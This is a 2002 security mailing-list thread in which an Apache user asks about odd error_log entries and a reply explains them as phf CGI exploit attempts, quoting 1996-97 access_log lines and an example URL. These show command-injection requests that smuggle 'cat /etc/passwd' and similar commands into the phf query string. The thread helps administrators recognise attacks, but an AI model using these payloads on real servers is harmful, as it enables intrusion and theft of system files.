On Fri, 15 Mar 2002, Dharmendra.T wrote: > Hi , > I hope you have written php cgi-bin script. And when the user try to acce= ss > some document in the cgi-bin directory it is looking for the php in > /usr/local/bin/php. > Another chance is somebody trying the phf exploit on your machine. > On Friday 15 March 2002 02:12 am, Tiago Fioreze wrote: > > I'm noting the following message in my error_log file > > of Apache : > > > > sh: /usr/local/bin/ph: n=E3o localizado. > > sh: /usr/local/bin/ph: n=E3o localizado. > > sh: /usr/local/bin/ph: n=E3o localizado. > > sh: /usr/local/bin/ph: n=E3o localizado. > > sh: /usr/local/bin/ph: n=E3o localizado. > > sh: /usr/local/bin/ph: n=E3o localizado. > > > > PS. 'n=E3o localizado' =3D not located > > Maybe this helps: Example phf exploit attempts These are from an actual Apache httpd access_log file: m52bmi.dave-world.net - - [07/Jul/1996:23:57:23 -0700] "GET /cgi-bin/phf?QA= lias=3Dx%20/etc/ls%20/etc HTTP/1.0" 404 - kairos.algonet.se - - [27/Oct/1996:09:00:33 -0800] "GET /cgi-bin/phf?Jserve= r=3Da&Qalias=3Da%0Aid HTTP/1.0" 500 - kairos.algonet.se - - [27/Oct/1996:09:01:25 -0800] "GET /cgi-bin/phf?Jserve= r=3Da&Qalias=3Da%0Acat%20/etc/passwd HTTP/1.0" 500 - ts-oc01-26.skyenet.net - - [03/Dec/1996:08:00:53 -0800] "GET /cgi-bin/phf?Q= alias=3D%0a/bin/cat%20/etc/passwd HTTP/1.0" 500 - ts-oc01-26.skyenet.net - - [03/Dec/1996:08:01:21 -0800] "GET /cgi-bin/phf?Q= alias=3D%0a/bin/cat%20/etc/passwd HTTP/1.0" 500 - ns - - [11/Feb/1997:06:18:21 -0800] "GET /cgi-bin/phf?Qalias=3D3Dx%0a/bin/c= at%20/etc/passwd HTTP/1.0" 500 - from http://staff.washington.edu/~dittrich/talks/web-security/phf.html see also: http://www.happyhacker.org/harmless/browser9.shtml http://www.victim.com/cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd and : phf prober perl script http://www.eng.auburn.edu/users/rayh/software/phf.html -------------- David Correa Public Key http://www.linux-tech.com/linuxtech.asc Key fingerprint 7F2C E072 479D 71B4 008B 373E A284 8CDE 7659 F5D8 ------------------------------------------------------------------------ To unsubscribe email security-discuss-request@linuxsecurity.com with "unsubscribe" in the subject of the message.
